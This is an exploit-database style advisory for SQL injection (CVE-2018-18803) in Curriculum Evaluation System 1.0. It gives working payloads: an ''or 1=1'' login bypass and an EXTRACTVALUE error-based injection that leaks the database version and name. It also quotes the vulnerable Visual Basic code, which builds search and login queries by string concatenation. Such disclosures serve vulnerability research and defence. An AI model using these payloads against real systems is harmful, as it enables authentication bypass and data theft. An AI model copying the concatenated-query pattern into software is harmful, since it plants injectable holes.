Curriculum Evaluation System 1.0 SQL Injection

`# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection  
# Dork: N/A  
# Date: 2018-10-29  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: https://www.sourcecodester.com/users/janobe  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip  
# Version: 1.0  
# Category: Windows  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-18803  
  
# POC:   
# 1)  
# User: 'or 1=1 or ''='  
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe  
  
# POC:   
# 2)  
# User: 'or 1=1 or ''='  
# Pass: Null  
#   
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png  
  
#[PATH]/frmCourse.vb  
#....  
#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged  
#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"  
#49 reloadDtg(sql, dtglist)  
#50 End Sub  
#....  
  
#[PATH]/includes/user.vb  
#....  
#05 Public Sub login(ByVal username As Object, ByVal pass As Object)  
#06 Try  
#07   
#08 con.Open()  
#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")  
#10   
#11   
#12 If dt.Rows.Count > 0 Then  
#13 If dt.Rows(0).Item("UserType") = "Administrator" Then  
#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))  
#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")  
#16 With Form1  
#17 .tsAddG.Enabled = True  
#18 .tsStudent.Enabled = True  
#19 .tsCurriculum.Enabled = True  
#20 .tsGrades.Enabled = True  
#21 .tsReport.Enabled = True  
#22 .tsUtilities.Enabled = True  
#23 .tsSearchStudent.Enabled = True  
#24 .tsLogin.Image = My.Resources.logout  
#25 .tsLogin.Text = "Logout"  
#26 End With  
#27   
#28   
#29 LoginForm1.Close()  
#30   
#31   
#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then  
#33   
#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))  
#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")  
#36 With Form1  
#37 .tsAddG.Enabled = True  
#38 .tsStudent.Enabled = True  
#39 .tsCurriculum.Enabled = True  
#40 .tsGrades.Enabled = True  
#41 .tsReport.Enabled = True  
#42 .tsSearchStudent.Enabled = True  
#43 .tsLogin.Image = My.Resources.logout  
#44 .tsLogin.Text = "Logout"  
#45 End With  
#46   
#47   
#48   
#49   
#50 LoginForm1.Close()  
#51   
#52   
#53   
#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then  
#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))  
#56 'With Form1  
#57 With Form1  
#58 .tsAddG.Enabled = True  
#59 .tsStudent.Enabled = True  
#60 .tsCurriculum.Enabled = True  
#61 .tsGrades.Enabled = True  
#62 .tsReport.Enabled = True  
#63   
#64 .tsSearchStudent.Enabled = True  
#65 .tsLogin.Image = My.Resources.logout  
#66 .tsLogin.Text = "Logout"  
#67 End With  
#68   
#69   
#70 LoginForm1.Close()  
#71 End If  
#72   
#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")  
#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")  
#75 'Form1.StatusStrip1.Visible = True  
#76 'inserting logs  
#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _  
#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"  
#79 'create(sql)  
#80   
#81 Else  
#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)  
#83 End If  
#84 Catch ex As Exception  
#85 MsgBox(ex.Message)  
#86 End Try  
#87 con.Close()  
#88 da.Dispose()  
#89 End Sub  
#....  
  
  
`